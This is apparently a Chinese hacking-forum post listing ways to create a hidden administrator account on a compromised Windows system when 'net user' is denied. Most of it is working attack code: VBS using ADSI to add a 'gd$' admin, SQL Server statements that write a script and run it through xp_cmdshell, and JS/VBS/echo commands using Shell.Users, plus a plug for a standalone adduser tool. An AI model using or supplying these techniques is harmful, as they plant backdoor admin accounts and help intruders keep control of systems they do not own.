1、当net user拒绝访问的时候,不要急着上传net1.exe,可以试下搜索本地其他目录下有没有net1.exe。试下有没有运行权限。如果都不行,再试下有无上传权限,有上传权限直接上传上传net1.exe,这个要看运气的。

2、利用VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,
Vbs代码如下 '建立一个gd$ 用户,密码为:123456

  1. set wsnetwork=CreateObject("WSCRIPT.NETWORK") 
  2. os="WinNT://"&wsnetwork.ComputerName 
  3. Set ob=GetObject(os) '得到adsi接口,绑定 
  4. Set oe=GetObject(os&"/Administrators,group") '属性,admin组 
  5. Set od=ob.Create("user","gd$") '建立用户 
  6. od.SetPassword "123456" '设置密码 
  7. od.SetInfo '保存 
  8. Set of=GetObject(os&"/gd$",user) '得到用户 
  9. oe.add os&"/gd$" 

由于所有带“&”字符的命令行都用echo无法写入1.vbs所以DOS下用Echo代码执行的方法偶还不会。如果有朋友会可以在下面留言给我。谢谢~
SQL分离器执行代码:

  1. declare @o int, @f int, @t int, @ret int 
  2. exec sp_oacreate 'scripting.filesystemobject', @o out 
  3. exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1 
  4. exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")' 
  5. exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName' 
  6. exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)' 
  7. exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")' 
  8. exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","gd$")' 
  9. exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123456"' 
  10. exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo ' 
  11. exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/gd$",user) ' 
  12. exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/gd$"' 

执行完上面的语句,再执行下面这行代码,这行代码一定单独执行,不要与上面的放在一起执行,否则会提示“c:\1.vbs正被另一个程序运行”而无法成功添加用户:  
exec master..xp_cmdshell 'cscript c:\1.vbs' "

3、用户控制面板文件nusrmgr.cpl中,调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。这个方法是lcx刚写出公开的,成功率高,推荐使用。

js:

  1. var o=new ActiveXObject( "Shell.Users" ); 
  2. z=o.create("test") ; 
  3. z.changePassword("123456","") 
  4. z.setting("AccountType")=3; 

vbs:

  1. Set o=CreateObject( "Shell.Users" ) 
  2. Set z=o.create("test") '建立用户 
  3. z.changePassword "123456","" '设置密码 
  4. z.setting("AccountType")=3 

Dos shell下直接用:

  1. echo Set o=CreateObject( "Shell.Users" ) >>c:\user.vbs 
  2. echo Set z=o.create("test")>>c:\user.vbs 
  3. echo z.changePassword "123456","">>c:\user.vbs 
  4. echo z.setting("AccountType")=3 >>c:\user.vbs 
  5. Cscript c:\user.vbs 
  6. del c:\user.vbs 

 

当然还有狼牙的一个无CMD添加用户小工具:adduser.rar

增加新用户并自动添加进Administrators组,不采用net.exe,net1.exe,防止部分机器删除后无法添加成功

使用方法:程序名 用户名 密码
示例:adduser.exe username password